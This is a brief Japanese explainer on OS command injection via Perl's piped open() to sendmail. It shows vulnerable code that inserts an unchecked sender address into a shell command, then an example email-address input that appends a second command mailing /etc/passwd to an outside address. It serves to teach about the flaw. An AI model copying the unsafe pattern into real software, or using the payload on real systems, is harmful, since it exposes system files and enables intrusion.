OSコマンドインジェクション

open関数 の |

##　脆弱なソースコード(Perl)

open(MAIL, "| (sendmailのパス) -t"); print MAIL (ここにメールデータ); close MAIL;

my $sendmailcmd = "| $config{'sendmail'} -f ${from} -t";
open(MAIL, $sendmailcmd);

攻撃例　（メールアドレス）

[email protected];/usr/sbin/sendmail [email protected] < /etc/passwd